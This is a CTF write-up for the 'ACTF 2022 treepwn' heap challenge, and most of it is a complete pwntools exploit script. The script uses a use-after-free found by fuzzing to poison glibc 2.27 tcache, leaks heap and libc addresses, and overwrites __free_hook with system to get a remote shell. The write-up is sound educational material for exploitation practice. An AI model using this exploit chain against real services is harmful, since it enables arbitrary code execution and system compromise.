
fuzzing!

2025-06-28 08:01By
KHIGHL
PWN

Problem: [ACTF 2022]treepwn

思路

  • 通过 fuzzing 找到能稳定触发 UAF 的具体操作序列；利用 UAF 劫持 tcache_perthread_struct 的 counts 数组域与 entries 链表域，实现任意地址写；再伪造某个堆块的头部（size 写成 0x221，并把对应 tcache bin 的 count 填满）使其 free 后进入 unsorted bin，从而泄露 libc 地址；最后把 __free_hook 劫持为 system 以 getshell。

EXP

from pwn import *
libc=ELF('./libc-2.27.so')  # target's glibc; symbol offsets (__free_hook, system) are added to the leaked base later
def cho(num):
    """Select menu entry *num* once the ``> `` prompt has been received."""
    choice = str(num).encode()
    r.sendlineafter(b'> ', choice)

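def add(x, y, name=b'\x00'):
    """Menu 0: insert an element at (x, y) with a 0x20-byte *name*.

    Raises EOFError when the target answers with "two many" so the exploit
    stops instead of desynchronising the menu.  The original spelled the
    exception ``EOFerror``, which is undefined and would surface as a
    NameError instead.

    NOTE(review): ``r.recv()`` returns whatever is currently buffered (no
    delimiter, no timeout tuning), so on a slow link the "two many" check may
    run against a partial banner and the following ``sendline`` may race the
    x-coordinate prompt.  If that bites, switch to ``recvuntil`` on the exact
    prompt text (not visible in this writeup).
    """
    cho(0)
    data = r.recv()
    print(data)
    if b"two many" in data:
        raise EOFError("target refused add(): too many elements")
    r.sendline(str(x).encode())
    r.sendlineafter(b"value: ", str(y).encode())
    # Names are fixed-width 0x20 bytes on the target side; pad with NULs.
    r.sendafter(b"new element name: ", name.ljust(0x20, b'\x00'))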

def delet(x, y):
    """Menu 1: delete the element stored at (x, y)."""
    cho(1)
    coords = (
        (b"want element x-coordinate value: ", x),
        (b"want element y-coordinate value: ", y),
    )
    for prompt, value in coords:
        r.sendlineafter(prompt, str(value).encode())

def edit(x, y, name):
    """Menu 2: overwrite the name of the element at (x, y).

    *name* is NUL-padded to the fixed 0x20-byte name width.  Calling this on
    an already deleted element is the use-after-free the exploit relies on.
    """
    cho(2)
    coords = (
        (b"want element x-coordinate value: ", x),
        (b"want element y-coordinate value: ", y),
    )
    for prompt, value in coords:
        r.sendlineafter(prompt, str(value).encode())
    payload = name.ljust(0x20, b'\x00')
    r.sendafter(b"name: ", payload)

def show(x, y):
    """Menu 3: display the element at (x, y) (unused by the final exploit)."""
    cho(3)
    for value in (x, y):
        r.sendlineafter(b'value', str(value).encode())

def query(a, b, c, d):
    """Menu 4: range query over the box (a, b)-(c, d).

    The target echoes each hit as ``<i>-th name: <raw bytes>``; the exploit
    reads its heap and libc leaks out of that output.
    """
    cho(4)
    for value in (a, b, c, d):
        r.sendlineafter(b"value: ", str(value).encode())
def bug():
    """Attach gdb to the tube; only meaningful when ``r`` is a local process()."""
    target = r
    gdb.attach(target)
#r=process('./pwn')
# Remote instance of the challenge.  Switch to the local process() above when
# debugging with bug(); all offsets below are specific to this binary/libc.
r=remote("node5.anna.nssctf.cn",23868)
# --- Heap grooming: the insert/delete sequence found by fuzzing.  Order is
# significant (tree rebalancing decides which chunks get freed); do not reorder.
add(1,1,str(10).encode())
add(0,6,str(20).encode())
add(7,2,str(30).encode())
add(2,0,str(40).encode())
add(1,3,str(50).encode())
add(3,4,str(60).encode())
add(6,5,str(70).encode())
add(4,8,str(80).encode())
delet(0,6)
add(3,7,str(90).encode())
add(7,6,str(110).encode())
add(2,2,b"aaa")
add(2,3,b'a'*8)
delet(2,3)
delet(2,2)
delet(1,3)
#delet(1,3)

# --- Heap leak: the range query still prints freed elements, so the 2nd name
# holds a heap pointer (presumably the tcache fd left in the freed name buffer).
# 0x5c0 is the measured distance from that pointer to the heap base — re-measure
# if the grooming sequence changes.
query(1,0,5,5)
r.recvuntil(b"2-th name: ")
heap=u64(r.recv(8))-0x5c0
print(f"heap=>{hex(heap)}")
head=heap+0x580  # chunk that is later given a fake 0x221 size header
#===============================================================
# --- UAF write: (1,3) was deleted above, so editing it rewrites the freed
# chunk's fd.  heap+0x10 is tcache_perthread_struct on glibc 2.27; +0x48 lands
# in its entries[] array (per the writeup's 思路 — confirm in gdb).
edit(1,3,p64(heap+0x10+0x48))
add(4,1)  # consume the first chunk of the poisoned tcache list
add(4,2)  # this allocation overlaps tcache_perthread_struct; editing (4,2) now rewrites tcache entries
edit(4,2,p64(heap+0x10))
add(4,3,p8(5)*2)  # allocation over the counts[] array: two bins marked as holding 5 chunks
edit(4,2,p64(heap+0x30))
add(4,4,p8(7))  # counts[0x20] = 7, i.e. the 0x220 tcache bin is reported full (2.27 layout assumption)
#===============================================================
# --- Build a fake 0x220 chunk at `head`.  With its tcache bin full, free() has
# to place it in the unsorted bin, whose fd/bk point into main_arena.
edit(4,2,p64(head-0x18))
add(5,5)
edit(4,2,p64(head))
add(4,5,p64(0)+p64(0x221))  # prev_size = 0, size = 0x221 (PREV_INUSE set)
edit(4,2,p64(head+0x10))
add(5,1)  # user pointer == head+0x10, i.e. the body of the fake chunk
delet(5,1)  # free(fake chunk) -> unsorted bin
# --- Libc leak: the 12th name starts at the fake header (0, 0x221); the 8
# bytes after it are the unsorted-bin fd.  0x3ebca0 is taken to be
# main_arena+96 for this libc-2.27 build — verify against ./libc-2.27.so.
query(0,0,6,6)
r.recvuntil(b"12-th name: \x00\x00\x00\x00\x00\x00\x00\x00!\x02\x00\x00\x00\x00\x00\x00")
base=u64(r.recv(8))-0x3ebca0
print(f"base=>{hex(base)}")
#===============================================================
# --- Hijack __free_hook: allocate at __free_hook-8 so the name buffer starts
# with "/bin/sh\0" and the following qword (== __free_hook) becomes system.
fhook=base+libc.sym.__free_hook
system=base+libc.sym.system
edit(4,2,p64(fhook-8))
add(5,6,b"/bin/sh\x00"+p64(system))

# free(name) -> __free_hook(name) -> system("/bin/sh")
delet(5,6)
r.interactive()
~

总结

  • 无需完整理解二进制中 R 树的实现，只需通过 fuzzing 找到能稳定触发 UAF 的操作序列，之后就是常规的 tcache 劫持与 __free_hook 覆写。
  
© 著作权归作者所有